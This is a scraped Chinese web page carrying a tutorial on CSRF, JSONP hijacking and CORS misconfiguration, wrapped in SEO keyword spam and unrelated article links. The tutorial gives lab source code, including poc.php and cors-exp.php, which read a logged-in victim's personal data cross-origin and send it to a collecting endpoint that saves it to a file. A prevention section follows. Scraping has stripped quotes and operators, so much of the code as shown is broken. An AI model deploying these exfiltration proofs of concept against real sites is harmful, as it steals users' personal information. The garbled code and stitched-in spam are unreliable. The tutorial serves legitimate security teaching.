当前位置: 首页 > news >正文

seo课培训网站seo优化服务

seo课培训,网站seo优化服务,镜美硅藻泥网站是那家公司做的,做网站编写代码一、CSRF 漏洞#xff1a; 1、漏洞概述#xff1a; #xff08;1#xff09;一般情景#xff1a; 利用已认证用户的身份执行未经用户授权的操作。攻击者试图欺骗用户在其不知情的情况下执行某些操作#xff0c;通常是在受害者已经登录到特定网站的情况下。 #xff0…一、CSRF 漏洞 1、漏洞概述 1一般情景 利用已认证用户的身份执行未经用户授权的操作。攻击者试图欺骗用户在其不知情的情况下执行某些操作通常是在受害者已经登录到特定网站的情况下。 2JSONP 漏洞 JSONP 是用于跨域读取数据的技术为了绕过同源策略可以使用 script src... img src... link href... iframe src... 等标签来进行跨域 3CORS 漏洞 1、CORS的引入: 由于同源策略的限制许多Web应用程序需要与不同域的资源进行交互 因此CORS被引入以允许这种跨域请求。 CORS是一种通过HTTP头部来控制的机制它告诉浏览器是否允许一个特定的跨域请求。2、CORS头部: 要使用CORS服务器需要在HTTP响应头部中包括一些特定的字段例如 1Access-Control-Allow-Origin: 指定允许访问资源的域可以是特定域名或 *表示允许任何域。 2Access-Control-Allow-Methods: 指定允许的HTTP方法如 GET、POST、PUT 等。 3Access-Control-Allow-Headers: 指定允许的HTTP头部用于在实际请求中包含自定义头部信息。 4Access-Control-Expose-Headers: 指定哪些响应头部可以被暴露给浏览器。 CORS 请求时时getResponseHeader()方法只能拿到 6 个基本字段Cache-Control、Content-Language、Content-Type、Expires、Last-Modified、Pragma。如果想拿到其他字段就必须在 Access-Control-Expose-Headers 里面指定。5Access-Control-Allow-Credentials: 指定是否允许发送身份验证凭证例如cookies。 6Access-Control-Max-Age: 指定预检请求的有效时间在发送实际请求之前进行的检查。3、简单请求和预检请求: 浏览器执行CORS请求时将根据请求的类型分为“简单请求”和“预检请求”。 1简单请求GET、HEAD 和 POST 方法且只包含了浏览器自动添加的标准头部例如 Content-Type。 2预检请求对于复杂请求浏览器会首先发送一个预检请求OPTIONS请求以检查服务器是否允许实际请求。4、安全性: CORS 的实施有助于确保跨域请求不会引发安全问题。服务器可以配置哪些域名允许访问资源可以控制允许的HTTP方法和头部以及是否允许发送身份验证凭证。这有助于防止恶意网站访问敏感资源。 在前端代码中使用XMLHttpRequest或Fetch API可以进行CORS请求。浏览器会自动处理CORS头部和响应。 2、漏洞情景 1一般情景 用户访问网站 A验证成功网站 A 回传给用户 cookie 参数在用户未退出网站 A 的情况下访问了网站 B网站 B 发送了一个访问网站 A 的请求用户点击后恶意代码执行攻击达成。 2JSPON 漏洞 网站 A 存在一个 jsonp 接口用户在网站 A 上登陆后这个 jsonp 接口会返回用户的个人信息并在网站 A 的页面上进行显示。如果网站 A 对此 jsonp 接口的来源验证存在漏洞那么当用户访问网站 B 时网站 B 便可以利用此漏洞获取用户信息。 3CORS 漏洞 其实都差不多一个意思 二、实例 实例1pikachu 靶场的 CSRF 1登陆成功后 2点击提交用 burpsuite 抓取修改页面的信息 3使用 Generator CSRF PoC 工具 4在退出登陆前访问生成的页面再点击后攻击达成 注意 1如果是 get 型的请求其实是不用点击的直接用短链接生成 url 就行了 2如果有 xss 漏洞可以自动访问这个 html 页面 实例2JSONP 漏洞 1、实例源码 1user.php ?php header(Content-type: application/json);$callback $_GET[callback];print $callback.({id:1,name:1,email:1});; ? 2get_json.html !DOCTYPE html htmlheadmeta charsetutf-8title/titlescript srchttp://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js/script/headbodyscriptfunction jsonp2(data){alert(JSON.stringify(data));}/scriptscript srchttp://localhost/jsonp/user.php?callbackjsonp2/script/body /html 3poc.php !DOCTYPE html html headmeta charsetUTF-8title/titlescript srchttp://apps.bdimg.com/libs/jquery/1.10.2/jquery.min.js/scriptscriptfunction test(data) {var xmlhttp new XMLHttpRequest();var url http://localhost/jsonp/poc.php?file JSON.stringify(data);xmlhttp.open(GET, url, true);xmlhttp.send();}/scriptscript srchttp://localhost/jsonp/user.php?callbacktest/script /head body /body /html?phpif ($_GET[file]) {file_put_contents(json.txt, $_GET[file]);} ? 2、漏洞复现 1访问 user.php 可以看到设定好的数据 2访问 get_json.html 可以弹窗获取设定好的数据 3访问 poc.php 可以把获取到的 json 数据保存在本地 json.txt 中 实例3CORS 漏洞 1、实例源码 1userinfo.php ?phpif ($_SERVER[HTTP_ORIGIN]){header(Access-Control-Allow-Origin: .$_SERVER[HTTP_ORIGIN]);}else{header(Access-Control-Allow-Origin: *);}header(Access-Control-Allow-Headers: X-Requested-With);header(Access-Control-Allow-Credentials: true);header(Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS);$info array(username Vulkey_Chen, mobilephone 13188888888, email admingh0st.cn, address 中华人民共和国, sex Cool Man);echo json_encode($info); ? 2test.html !DOCTYPE html html langen headmeta charsetUTF-8titleCors/title /head body scriptfunction cors() {var xhr new XMLHttpRequest();xhr.onreadystatechange function () {if(xhr.readyState 4){alert(xhr.responseText);}}xhr.open(GET,http://localhost:860/csrf/userinfo.php);xhr.send();}cors(); /script /body /html 3cors-exp.php /head body scriptfunction cors() {var xhr new XMLHttpRequest();var xhr1 new XMLHttpRequest();xhr.onreadystatechange function () {if(xhr.readyState 4){alert(xhr.responseText)var data xhr.responseText;xhr1.open(POST,http://localhost/cors/cors-exp.php,true);xhr1.setRequestHeader(Content-type,application/x-www-form-urlencoded);alert(data);xhr1.send(moonescape(cc));}}xhr.open(GET,http://localhost:860/csrf/userinfo.php);xhr.send();}cors(); /script /body /html?php$data $_POST[cc];if($data){$myfile fopen(data1.txt,w);fwrite($myfile,$data);fclose($myfile);} ? 2、漏洞复现 1先访问 userinfo.php 2访问 test.html 测试 3访问 cors-exp.php 来进行文件写入 三、漏洞预防 1、增加 Token 验证对关键操作增加 Token 参数token 必须随机每次都不一样 2、关于安全的会话管理避免会话被利用 不要在客户端保存敏感信息比如身份验证信息 退出、关闭浏览器时的会话过期机制 设置会话过机制比如 15 分钟无操作则自动登录超时 3、访问控制安全管理 敏感信息的修改时需要身份进行二次认证比如修改账号密码需要判断旧 密码 4、敏感信息的修改使用 POST而不是 GET 通过 HTTP 头部中的 REFERER 来限制原页面 5、JSONP 存在安全风险因此如果不是必需尽量避免使用它。而是使用更安全的替代方法如CORS 6、CORS 是一种更安全的方法允许服务器控制哪些域可以访问其资源。使用CORS需要在服务器端进行配置以明确指定允许的域 7、如果必须使用 JSONP确保对从客户端接收的数据进行严格的输入验证和过滤。不要信任客户端提供的数据因为它可能包含恶意代码 8、设置回调函数随机 9、CORS 不要配置 Access-Control-Allow-Origin  为通配符“*” 10、要严格效验来自请求数据包中的Origin 的值。当收到跨域请求的时候要检查Origin 的值是否是一个可信的源 还要检查是否为 null 11、避免使用 Access-Control-Allow-Credentials: true 12、减少 Access-Control- Allow-Methods 所允许的方法
http://www.zqtcl.cn/news/411169/

相关文章:

  • 网站建设招标信息科技企业网站建设
  • 怎样弄网站站长工具综合查询
  • 表白网站在线制作软件合肥seo按天收费
  • 襄阳企业网站建设免费行情的软件入口下载
  • 对百度网站进行分析中国机械加工网18易0下6拉en
  • 一般做网站都在什么网做wordpress轮播图设置
  • 深圳装饰公司网站thinkphp 网站根目录地址
  • 购物网站建设资讯原创文章代写
  • 门票预订网站建设wordpress siren主题
  • 单位建设网站装修公司需要什么资质
  • 做做做网站做网站赚外快
  • 网站备案后应该做什么网站流量监测
  • 开发网站用什么语言做名片的网站叫什么来着
  • 织梦做网站好不好iis中的网站启动不了
  • 临汾住房与城乡建设厅网站迎访问中国建设银行网站_
  • 织梦做的网站首页幻灯片怎么不能显示北大青鸟网站建设课程
  • 做淘客的网站有哪些延安市住建建设网站
  • 南京林业大学实验与建设网站现在都用什么软件搜索附近的人
  • 建站系统wordpress下载亚马逊雨林十大恐怖生物
  • 凡科网做网站怎么样专业团队电影
  • 有什么有趣的网站移动网站排名怎么做
  • 深圳网站建设专家wordpress 4.5下载地址
  • 网站建设公司公司我我提供一个平台wordpress如何去版权信息
  • seo怎么给网站做外链受欢迎的网站建设教程
  • 网站建设使用多语言河南电商网站设计
  • 网站搭建有免费的吗网站地图生成代码
  • 建设公司网站要注意什么投资小利润高的小生意
  • 网站建设需要做哪些工作做胃镜需那好天津津门网站A
  • 做网站申请域名的流程辽宁省工程造价网
  • 网站系统维护一般多长时间金华高端网站设计